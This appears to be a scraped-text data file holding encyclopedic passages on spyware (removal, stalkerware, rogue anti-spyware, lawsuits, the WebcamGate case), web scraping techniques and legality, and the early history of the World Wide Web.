As new spyware programs are released, anti-spyware developers discover and evaluate them, adding to the list of known spyware, which allows the software to detect and remove new spyware. As a result, anti-spyware software is of limited usefulness without regular updates. Updates may be installed automatically or manually. A popular generic spyware removal tool used by those that requires a certain degree of expertise is HijackThis, which scans certain areas of the Windows OS where spyware often resides and presents a list with items to delete manually. As most of the items are legitimate windows files registry entries it is advised for those who are less knowledgeable on this subject to post a HijackThis log on the numerous antispyware sites and let the experts decide what to delete. If a spyware program is not blocked and manages to get itself installed, it may resist attempts to terminate or uninstall it. Some programs work in pairs: when an anti-spyware scanner (or the user) terminates one running process, the other one respawns the killed program. Likewise, some spyware will detect attempts to remove registry keys and immediately add them again. Usually, booting the infected computer in safe mode allows an anti-spyware program a better chance of removing persistent spyware. Killing the process tree may also work. To detect spyware, computer users have found several practices useful in addition to installing anti-spyware programs. Many users have installed a web browser other than Internet Explorer, such as Mozilla Firefox or Google Chrome. Though no browser is completely safe, Internet Explorer was once at a greater risk for spyware infection due to its large user base as well as vulnerabilities such as ActiveX but these three major browsers are now close to equivalent when it comes to security. 22 23 Some ISPs—particularly colleges and universities—have taken a different approach to blocking spyware: they use their network firewalls and web proxies to block access to Web sites known to install spyware. On March 31, 2005, Cornell University's Information Technology department released a report detailing the behavior of one particular piece of proxy-based spyware, Marketscore, and the steps the university took to intercept it. 24 Many other educational institutions have taken similar steps. Individual users can also install firewalls from a variety of companies. These monitor the flow of information going to and from a networked computer and provide protection against spyware and malware. Some users install a large hosts file which prevents the user's computer from connecting to known spyware-related web addresses. Spyware may get installed via certain shareware programs offered for download. Downloading programs only from reputable sources can provide some protection from this source of attack. 25 Individual users can use cellphone computer with physical (electric) switch, or isolated electronic switch that disconnects microphone, camera without bypass and keep it in disconnected position where not in use, that limits information that spyware can collect. (Policy recommended by NIST Guidelines for Managing the Security of Mobile Devices, 2013). A few spyware vendors, notably 180 Solutions, have written what the New York Times has dubbed "stealware", and what spyware researcher Ben Edelman terms affiliate fraud, a form of click fraud. Stealware diverts the payment of affiliate marketing revenues from the legitimate affiliate to the spyware vendor. 
Spyware which attacks affiliate networks places the spyware operator's affiliate tag on the user's activity replacing any other tag, if there is one. The spyware operator is the only party that gains from this. The user has their choices thwarted, a legitimate affiliate loses revenue, networks' reputations are injured, and vendors are harmed by having to pay out affiliate revenues to an "affiliate" who is not party to a contract. 26 Affiliate fraud is a violation of the terms of service of most affiliate marketing networks. Mobile devices can also be vulnerable to chargeware, which manipulates users into illegitimate mobile charges. In one case, spyware has been closely associated with identity theft. 27 In August 2005, researchers from security software firm Sunbelt Software suspected the creators of the common CoolWebSearch spyware had used it to transmit "chat sessions, user names, passwords, bank information, etc. ; 28 however it turned out that "it actually (was) its own sophisticated criminal little trojan that's independent of CWS. 29 This case is currently under investigation by the FBI. The Federal Trade Commission estimates that 27.3 million Americans have been victims of identity theft, and that financial losses from identity theft totaled nearly $48 billion for businesses and financial institutions and at least $5 billion in out-of-pocket expenses for individuals. 30 Some copy-protection technologies have borrowed from spyware. In 2005, Sony BMG Music Entertainment was found to be using rootkits in its XCP digital rights management technology 31 Like spyware, not only was it difficult to detect and uninstall, it was so poorly written that most efforts to remove it could have rendered computers unable to function. Texas Attorney General Greg Abbott filed suit, 32 and three separate class-action suits were filed. 33 Sony BMG later provided a workaround on its website to help users remove it. 34 Beginning on April 25, 2006, Microsoft's Windows Genuine Advantage Notifications application 35 was installed on most Windows PCs as a "critical security update". While the main purpose of this deliberately uninstallable application is to ensure the copy of Windows on the machine was lawfully purchased and installed, it also installs software that has been accused of "phoning home" on a daily basis, like spyware. 36 37 It can be removed with the RemoveWGA tool. Stalkerware is spyware that has been used to monitor electronic activities of partners in intimate relationships. At least one software package, Loverspy, was specifically marketed for this purpose. Depending on local laws regarding communal marital property, observing a partner's online activity without their consent may be illegal; the author of Loverspy and several users of the product were indicted in California in 2005 on charges of wiretapping and various computer crimes. 38 Anti-spyware programs often report Web advertisers' HTTP cookies, the small text files that track browsing activity, as spyware. While they are not always inherently malicious, many users object to third parties using space on their personal computers for their business purposes, and many anti-spyware programs offer to remove them. 39 Shameware or "accountability software" is a type of spyware that is not hidden from the user, but operates with their knowledge, if not necessarily their consent. 
Parents, religious leaders or other authority figures may require their children or congregation members to install such software, which is intended to detect the viewing of pornography or other content deemed inappropriate, and to report it to the authority figure, who may then confront the user about it. 40 These common spyware programs illustrate the diversity of behaviors found in these attacks. Note that as with computer viruses, researchers give names to spyware programs which may not be used by their creators. Programs may be grouped into "families" based not on shared program code, but on common behaviors, or by "following the money" of apparent financial or business connections. For instance, a number of the spyware programs distributed by Claria are collectively known as "Gator". Likewise, programs that are frequently installed together may be described as parts of the same spyware package, even if they function separately. Spyware vendors include NSO Group, which in the 2010s sold spyware to governments for spying on human rights activists and journalists. 41 42 43 NSO Group was investigated by Citizen Lab. 41 43 Malicious programmers have released a large number of rogue (fake) anti-spyware programs, and widely distributed Web banner ads can warn users that their computers have been infected with spyware, directing them to purchase programs which do not actually remove spyware—or else, may add more spyware of their own. 44 45 The recent update proliferation of fake or spoofed antivirus products that bill themselves as antispyware can be troublesome. Users may receive popups prompting them to install them to protect their computer, when it will in fact add spyware. It is recommended that users do not install any freeware claiming to be anti-spyware unless it is verified to be legitimate. Some known offenders include: Fake antivirus products constitute 15 percent of all malware. 47 On January 26, 2006, Microsoft and the Washington state attorney general filed suit against Secure Computer for its Spyware Cleaner product. 48 Unauthorized access to a computer is illegal under computer crime laws, such as the U.S. Computer Fraud and Abuse Act, the U.K.'s Computer Misuse Act, and similar laws in other countries. Since owners of computers infected with spyware generally claim that they never authorized the installation, a prima facie reading would suggest that the promulgation of spyware would count as a criminal act. Law enforcement has often pursued the authors of other malware, particularly viruses. However, few spyware developers have been prosecuted, and many operate openly as strictly legitimate businesses, though some have faced lawsuits. 49 50 Spyware producers argue that, contrary to the users' claims, users do in fact give consent to installations. Spyware that comes bundled with shareware applications may be described in the legalese text of an end-user license agreement (EULA). Many users habitually ignore these purported contracts, but spyware companies such as Claria say these demonstrate that users have consented. Despite the ubiquity of EULAs agreements, under which a single click can be taken as consent to the entire text, relatively little caselaw has resulted from their use. It has been established in most common law jurisdictions that this type of agreement can be a binding contract in certain circumstances. 51 This does not, however, mean that every such agreement is a contract, or that every term in one is enforceable. Some jurisdictions, including the U.S. 
states of Iowa 52 and Washington, 53 have passed laws criminalizing some forms of spyware. Such laws make it illegal for anyone other than the owner or operator of a computer to install software that alters Web-browser settings, monitors keystrokes, or disables computer-security software. In the United States, lawmakers introduced a bill in 2005 entitled the Internet Spyware Prevention Act, which would imprison creators of spyware. 54 The US Federal Trade Commission has sued Internet marketing organizations under the "unfairness doctrine" 55 to make them stop infecting consumers' PCs with spyware. In one case, that against Seismic Entertainment Productions, the FTC accused the defendants of developing a program that seized control of PCs nationwide, infected them with spyware and other malicious software, bombarded them with a barrage of pop-up advertising for Seismic's clients, exposed the PCs to security risks, and caused them to malfunction. Seismic then offered to sell the victims an "antispyware" program to fix the computers, and stop the popups and other problems that Seismic had caused. On November 21, 2006, a settlement was entered in federal court under which a $1.75 million judgment was imposed in one case and $1.86 million in another, but the defendants were insolvent 56 In a second case, brought against CyberSpy Software LLC, the FTC charged that CyberSpy marketed and sold "RemoteSpy" keylogger spyware to clients who would then secretly monitor unsuspecting consumers' computers. According to the FTC, Cyberspy touted RemoteSpy as a "100% undetectable" way to "Spy on Anyone. From Anywhere. The FTC has obtained a temporary order prohibiting the defendants from selling the software and disconnecting from the Internet any of their servers that collect, store, or provide access to information that this software has gathered. The case is still in its preliminary stages. A complaint filed by the Electronic Privacy Information Center (EPIC) brought the RemoteSpy software to the FTC's attention. 57 An administrative fine, the first of its kind in Europe, has been issued by the Independent Authority of Posts and Telecommunications (OPTA) from the Netherlands. It applied fines in total value of Euro 1,000,000 for infecting 22 million computers. The spyware concerned is called DollarRevenue. The law articles that have been violated are art. 4.1 of the Decision on universal service providers and on the interests of end users; the fines have been issued based on art. 15.4 taken together with art. 15.10 of the Dutch telecommunications law. 58 Former New York State Attorney General and former Governor of New York Eliot Spitzer has pursued spyware companies for fraudulent installation of software. 59 In a suit brought in 2005 by Spitzer, the California firm Intermix Media, Inc. ended up settling, by agreeing to pay US$7.5 million and to stop distributing spyware. 60 The hijacking of Web advertisements has also led to litigation. In June 2002, a number of large Web publishers sued Claria for replacing advertisements, but settled out of court. Courts have not yet had to decide whether advertisers can be held liable for spyware that displays their ads. In many cases, the companies whose advertisements appear in spyware pop-ups do not directly do business with the spyware firm. Rather, they have contracted with an advertising agency, which in turn contracts with an online subcontractor who gets paid by the number of "impressions" or appearances of the advertisement. 
Some major firms such as Dell Computer and Mercedes-Benz have sacked advertising agencies that have run their ads in spyware. 61 Litigation has gone both ways. Since "spyware" has become a common pejorative, some makers have filed libel and defamation actions when their products have been so described. In 2003, Gator (now known as Claria) filed suit against the website PC Pitstop for describing its program as "spyware". 62 PC Pitstop settled, agreeing not to use the word "spyware", but continues to describe harm caused by the Gator Claria software. 63 As a result, other anti-spyware and anti-virus companies have also used other terms such as "potentially unwanted programs" or greyware to denote these products. In the 2010 WebcamGate case, plaintiffs charged two suburban Philadelphia high schools secretly spied on students by surreptitiously and remotely activating webcams embedded in school-issued laptops the students were using at home, and therefore infringed on their privacy rights. The school loaded each student's computer with LANrev's remote activation tracking software. This included the now-discontinued "TheftTrack". While TheftTrack was not enabled by default on the software, the program allowed the school district to elect to activate it, and to choose which of the TheftTrack surveillance options the school wanted to enable. 64 TheftTrack allowed school district employees to secretly remotely activate the webcam embedded in the student's laptop, above the laptop's screen. That allowed school officials to secretly take photos through the webcam, of whatever was in front of it and in its line of sight, and send the photos to the school's server. The LANrev software disabled the webcams for all other uses (e.g., students were unable to use Photo Booth or video chat), so most students mistakenly believed their webcams did not work at all. On top of the webcam surveillance, TheftTrack allowed school officials to take screenshots and send them to the school's server. School officials were also granted the ability to take snapshots of instant messages, web browsing, music playlists, and written compositions. The schools admitted to secretly snapping over 66,000 webshots and screenshots, including webcam shots of students in their bedrooms. 64 65 66 |
140 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#bodyContent | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
141 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/History_of_the_World_Wide_Web | The World Wide Web ("WWW", "W3" or simply "the Web") is a global information medium that users can access via computers connected to the Internet. The term is often mistakenly used as a synonym for the Internet, but the Web is a service that operates over the Internet, just as email and Usenet do. The history of the Internet and the history of hypertext date back significantly further than that of the World Wide Web. Tim Berners-Lee invented the World Wide Web while working at CERN in 1989. He proposed a "universal linked information system" using several concepts and technologies, the most fundamental of which was the connections that existed between information. 1 2 He developed the first web server, the first web browser, and a document formatting protocol, called Hypertext Markup Language (HTML). After publishing the markup language in 1991, and releasing the browser source code for public use in 1993, many other web browsers were soon developed, with Marc Andreessen's Mosaic (later Netscape Navigator), being particularly easy to use and install, and often credited with sparking the Internet boom of the 1990s. It was a graphical browser which ran on several popular office and home computers, bringing multimedia content to non-technical users by including images and text on the same page. Websites for use by the general public began to emerge in 1993 94. This spurred competition in server and browser software, highlighted in the Browser wars which was initially dominated by Netscape Navigator and Internet Explorer. Following the complete removal of commercial restrictions on Internet use by 1995, commercialization of the Web amidst macroeconomic factors led to the dot-com boom and bust in the late 1990s and early 2000s. The features of HTML evolved over time, leading to HTML version 2 in 1995, HTML3 and HTML4 in 1997, and HTML5 in 2014. The language was extended with advanced formatting in Cascading Style Sheets (CSS) and with programming capability by JavaScript. AJAX programming delivered dynamic content to users, which sparked a new era in Web design, styled Web 2.0. The use of social media, becoming common-place in the 2010s, allowed users to compose multimedia content without programming skills, making the Web ubiquitous in every-day life. The underlying concept of hypertext as a user interface paradigm originated in projects in the 1960s, from research such as the Hypertext Editing System (HES) by Andries van Dam at Brown University, IBM Generalized Markup Language, Ted Nelson's Project Xanadu, and Douglas Engelbart's oN-Line System (NLS). 3 page needed non-primary source needed Both Nelson and Engelbart were in turn inspired by Vannevar Bush's microfilm-based memex, which was described in the 1945 essay "As We May Think". 4 title missing 5 Other precursors were FRESS and Intermedia. Paul Otlet's project Mundaneum has also been named as an early 20th-century precursor of the Web. In 1980, Tim Berners-Lee, at the European Organization for Nuclear Research (CERN) in Switzerland, built ENQUIRE, as a personal database of people and software models, but also as a way to experiment with hypertext; each new page of information in ENQUIRE had to be linked to another page. 6 7 When Berners-Lee built ENQUIRE, the ideas developed by Bush, Engelbart, and Nelson did not influence his work, since he was not aware of them. 
However, as Berners-Lee began to refine his ideas, the work of these predecessors would later help to confirm the legitimacy of his concept. 6 8 During the 1980s, many packet-switched data networks emerged based on various communication protocols (see Protocol Wars). One of these standards was the Internet protocol suite, which is often referred to as TCP IP. As the Internet grew through the 1980s, many people realized the increasing need to be able to find and organize files and use information. By 1985, the Domain Name System (upon which the Uniform Resource Locator is built) came into being. 9 better source needed failed verification Many small, self-contained hypertext systems were created, such as Apple Computer's HyperCard (1987). Berners-Lee's contract in 1980 was from June to December, but in 1984 he returned to CERN in a permanent role, and considered its problems of information management: physicists from around the world needed to share data, yet they lacked common machines and any shared presentation software. Shortly after Berners-Lee's return to CERN, TCP IP protocols were installed on Unix machines at the institution, turning it into the largest Internet site in Europe. In 1988, the first direct IP connection between Europe and North America was established and Berners-Lee began to openly discuss the possibility of a web-like system at CERN. 10 He was inspired by a book, Enquire Within upon Everything. Many online services existed before the creation of the World Wide Web, such as for example CompuServe and bulletin board systems. 11 While working at CERN, Tim Berners-Lee became frustrated with the inefficiencies and difficulties posed by finding information stored on different computers. 12 On 12 March 1989, he submitted a memorandum, titled "Information Management: A Proposal", 1 13 to the management at CERN. The proposal used the term "web" and was based on "a large hypertext database with typed links". It described a system called "Mesh" that referenced ENQUIRE, the database and software project he had built in 1980, with a more elaborate information management system based on links embedded as text: "Imagine, then, the references in this document all being associated with the network address of the thing to which they referred, so that while reading this document, you could skip to them with a click of the mouse. Such a system, he explained, could be referred to using one of the existing meanings of the word hypertext, a term that he says was coined in the 1950s. Berners-Lee notes the possibility of multimedia documents that include graphics, speech and video, which he terms hypermedia. 1 2 Although the proposal attracted little interest, Berners-Lee was encouraged by his manager, Mike Sendall, to begin implementing his system on a newly acquired NeXT workstation. He considered several names, including Information Mesh, The Information Mine or Mine of Information, but settled on World Wide Web. Berners-Lee found an enthusiastic supporter in his colleague and fellow hypertext enthusiast Robert Cailliau who began to promote the proposed system throughout CERN. Berners-Lee and Cailliau pitched Berners-Lee's ideas to the European Conference on Hypertext Technology in September 1990, but found no vendors who could appreciate his vision. Berners-Lee's breakthrough was to marry hypertext to the Internet. In his book Weaving The Web, he explains that he had repeatedly suggested to members of both technical communities that a marriage between the two technologies was possible. 
But, when no one took up his invitation, he finally assumed the project himself. In the process, he developed three essential technologies: With help from Cailliau he published a more formal proposal on 12 November 1990 to build a "hypertext project" called World Wide Web (abbreviated "W3") as a "web" of "hypertext documents" to be viewed by "browsers" using a client server architecture. 15 16 The proposal was modelled after the Standard Generalized Markup Language (SGML) reader Dynatext by Electronic Book Technology, a spin-off from the Institute for Research in Information and Scholarship at Brown University. The Dynatext system, licensed by CERN, was considered too expensive and had an inappropriate licensing policy for use in the general high energy physics community, namely a fee for each document and each document alteration. citation needed At this point HTML and HTTP had already been in development for about two months and the first web server was about a month from completing its first successful test. Berners-Lee's proposal estimated that a read-only Web would be developed within three months and that it would take six months to achieve "the creation of new links and new material by readers, so that authorship becomes universal" as well as "the automatic notification of a reader when new material of interest to him her has become available". By December 1990, Berners-Lee and his work team had built all the tools necessary for a working Web: the HyperText Transfer Protocol (HTTP), the HyperText Markup Language (HTML), the first web browser (named WorldWideWeb, which was also a web editor), the first web server (later known as CERN httpd) and the first web site (http: info.cern.ch) containing the first web pages that described the project itself was published on 20 December 1990. 17 18 The browser could access Usenet newsgroups and FTP files as well. A NeXT Computer was used by Berners-Lee as the web server and also to write the web browser. 19 Working with Berners-Lee at CERN, Nicola Pellow developed the first cross-platform web browser, the Line Mode Browser. 20 In January 1991, the first web servers outside CERN were switched on. On 6 August 1991, Berners-Lee published a short summary of the World Wide Web project on the newsgroup alt.hypertext, inviting collaborators. 21 Paul Kunz from the Stanford Linear Accelerator Center (SLAC) visited CERN in September 1991, and was captivated by the Web. He brought the NeXT software back to SLAC, where librarian Louise Addis adapted it for the VM CMS operating system on the IBM mainframe as a way to host the SPIRES-HEP database and display SLAC's catalog of online documents. 22 23 24 25 This was the first web server outside of Europe and the first in North America. 26 The World Wide Web had several differences from other hypertext systems available at the time. The Web required only unidirectional links rather than bidirectional ones, making it possible for someone to link to another resource without action by the owner of that resource. It also significantly reduced the difficulty of implementing web servers and browsers (in comparison to earlier systems), but in turn, presented the chronic problem of link rot. The WorldWideWeb browser only ran on NeXTSTEP operating system. 
This shortcoming was discussed in January 1992, 27 and alleviated in April 1992 by the release of Erwise, an application developed at the Helsinki University of Technology, and in May by ViolaWWW, created by Pei-Yuan Wei, which included advanced features such as embedded graphics, scripting, and animation. ViolaWWW was originally an application for HyperCard. 28 Both programs ran on the X Window System for Unix. In 1992, the first tests between browsers on different platforms were concluded successfully between buildings 513 and 31 in CERN, between browsers on the NexT station and the X11 ported Mosaic browser. ViolaWWW became the recommended browser at CERN. To encourage use within CERN, Bernd Pollermann put the CERN telephone directory on the web—previously users had to log onto the mainframe in order to look up phone numbers. The Web was successful at CERN and spread to other scientific and academic institutions. Students at the University of Kansas adapted an existing text-only hypertext browser, Lynx, to access the web in 1992. Lynx was available on Unix and DOS, and some web designers, unimpressed with glossy graphical websites, held that a website not accessible through Lynx was not worth visiting. In these earliest browsers, images opened in a separate "helper" application. In the early 1990s, Internet-based projects such as Archie, Gopher, Wide Area Information Servers (WAIS), and the FTP Archive list attempted to create ways to organize distributed data. Gopher was a document browsing system for the Internet, released in 1991 by the University of Minnesota. Invented by Mark P. McCahill, it became the first commonly used hypertext interface to the Internet. While Gopher menu items were examples of hypertext, they were not commonly perceived in that way clarification needed . In less than a year, there were hundreds of Gopher servers. 29 It offered a viable alternative to the World Wide Web in the early 1990s and the consensus was that Gopher would be the primary way that people would interact with the Internet. 30 31 However, in 1993, the University of Minnesota declared that Gopher was proprietary and would have to be licensed. 29 In response, on 30 April 1993, CERN announced that the World Wide Web would be free to anyone, with no fees due, and released their code into the public domain. 32 This made it possible to develop servers and clients independently and to add extensions without licensing restrictions. citation needed Coming two months after the announcement that the server implementation of the Gopher protocol was no longer free to use, this spurred the development of various browsers which precipitated a rapid shift away from Gopher. 33 By releasing Berners-Lee's invention for public use, CERN encouraged and enabled its widespread use. 34 Early websites intermingled links for both the HTTP web protocol and the Gopher protocol, which provided access to content through hypertext menus presented as a file system rather than through HTML files. Early Web users would navigate either by bookmarking popular directory pages or by consulting updated lists such as the NCSA "What's New" page. Some sites were also indexed by WAIS, enabling users to submit full-text searches similar to the capability later provided by search engines. After 1993 the World Wide Web saw many advances to indexing and ease of access through search engines, which often neglected Gopher and Gopherspace. 
As its popularity increased through ease of use, incentives for commercial investment in the Web also grew. By the middle of 1994, the Web was outcompeting Gopher and the other browsing systems for the Internet. 35 The National Center for Supercomputing Applications (NCSA) at the University of Illinois at Urbana Champaign (UIUC) established a website in November 1992. After Marc Andreessen, a student at UIUC, was shown ViolaWWW in late 1992, 28 he began work on Mosaic with another UIUC student Eric Bina, using funding from the High-Performance Computing and Communications Initiative, a US-federal research and development program initiated by US Senator Al Gore. 36 37 38 Andreessen and Bina released a Unix version of the browser in February 1993; Mac and Windows versions followed in August 1993. The browser gained popularity due to its strong support of integrated multimedia, and the authors' rapid response to user bug reports and recommendations for new features. 28 Historians generally agree that the 1993 introduction of the Mosaic web browser was a turning point for the World Wide Web. 39 40 41 Before the release of Mosaic in 1993, graphics were not commonly mixed with text in web pages, and the Web was less popular than older protocols such as Gopher and WAIS. Mosaic could display inline images 42 and submit forms 43 44 for Windows, Macintosh and X-Windows. NCSA also developed HTTPd, a Unix web server that used the Common Gateway Interface to process forms and Server Side Includes for dynamic content. Both the client and server were free to use with no restrictions. 45 Mosaic was an immediate hit; 46 its graphical user interface allowed the Web to become by far the most popular protocol on the Internet. Within a year, web traffic surpassed Gopher's. 29 Wired declared that Mosaic made non-Internet online services obsolete, 47 and the Web became the preferred interface for accessing the Internet. citation needed The World Wide Web enabled the spread of information over the Internet through an easy-to-use and flexible format. It thus played an important role in popularising use of the Internet. 48 Although the two terms are sometimes conflated in popular use, World Wide Web is not synonymous with Internet. 49 The Web is an information space containing hyperlinked documents and other resources, identified by their URIs. 50 It is implemented as both client and server software using Internet protocols such as TCP IP and HTTP. In keeping with its origins at CERN, early adopters of the Web were primarily university-based scientific departments or physics laboratories such as SLAC and Fermilab. By January 1993 there were fifty web servers across the world. 51 By October 1993 there were over five hundred servers online, including some notable websites. 52 Practical media distribution and streaming media over the Web was made possible by advances in data compression, due to the impractically high bandwidth requirements of uncompressed media. Following the introduction of the Web, several media formats based on discrete cosine transform (DCT) were introduced for practical media distribution and streaming over the Web, including the MPEG video format in 1991 and the JPEG image format in 1992. The high level of image compression made JPEG a good format for compensating slow Internet access speeds, typical in the age of dial-up Internet access. JPEG became the most widely used image format for the World Wide Web. 
A DCT variation, the modified discrete cosine transform (MDCT) algorithm, led to the development of MP3, which was introduced in 1991 and became the first popular audio format on the Web. In 1992 the Computing and Networking Department of CERN, headed by David Williams, withdrew support of Berners-Lee's work. A two-page email sent by Williams stated that the work of Berners-Lee, with the goal of creating a facility to exchange information such as results and comments from CERN experiments to the scientific community, was not the core activity of CERN and was a misallocation of CERN's IT resources. Following this decision, Tim Berners-Lee left CERN for the Massachusetts Institute of Technology (MIT), where he continued to develop HTTP. citation needed The first Microsoft Windows browser was Cello, written by Thomas R. Bruce for the Legal Information Institute at Cornell Law School to provide legal information, since access to Windows was more widespread amongst lawyers than access to Unix. Cello was released in June 1993. The rate of web site deployment increased sharply around the world, and fostered development of international standards for protocols and content formatting. 53 Berners-Lee continued to stay involved in guiding web standards, such as the markup languages to compose web pages, and he advocated his vision of a Semantic Web (sometimes known as Web 3.0) based around machine-readability and interoperability standards. In May 1994, the first International WWW Conference, organized by Robert Cailliau, was held at CERN; the conference has been held every year since. The World Wide Web Consortium (W3C) was founded by Tim Berners-Lee after he left the European Organization for Nuclear Research (CERN) in September October 1994 in order to create open standards for the Web. 54 It was founded at the Massachusetts Institute of Technology Laboratory for Computer Science (MIT LCS) with support from the Defense Advanced Research Projects Agency (DARPA), which had pioneered the Internet. A year later, a second site was founded at INRIA (a French national computer research lab) with support from the European Commission; and in 1996, a third continental site was created in Japan at Keio University. W3C comprised various companies that were willing to create standards and recommendations to improve the quality of the Web. Berners-Lee made the Web available freely, with no patent and no royalties due. The W3C decided that its standards must be based on royalty-free technology, so they can be easily adopted by anyone. Netscape and Microsoft, in the middle of a browser war, ignored the W3C and added elements to HTML ad hoc (e.g., blink and marquee). Finally, in 1995, Netscape and Microsoft came to their senses and agreed to abide by the W3C's standard. 55 The W3C published the standard for HTML 4 in 1997, which included Cascading Style Sheets (CSS), giving designers more control over the appearance of web pages without the need for additional HTML tags. The W3C could not enforce compliance so none of the browsers were fully compliant. This frustrated web designers who formed the Web Standards Project (WaSP) in 1998 with the goal of cajoling compliance with standards. 56 A List Apart and CSS Zen Garden were influential websites that promoted good design and adherence to standards. 57 Nevertheless, AOL halted development of Netscape 58 and Microsoft was slow to update IE. 
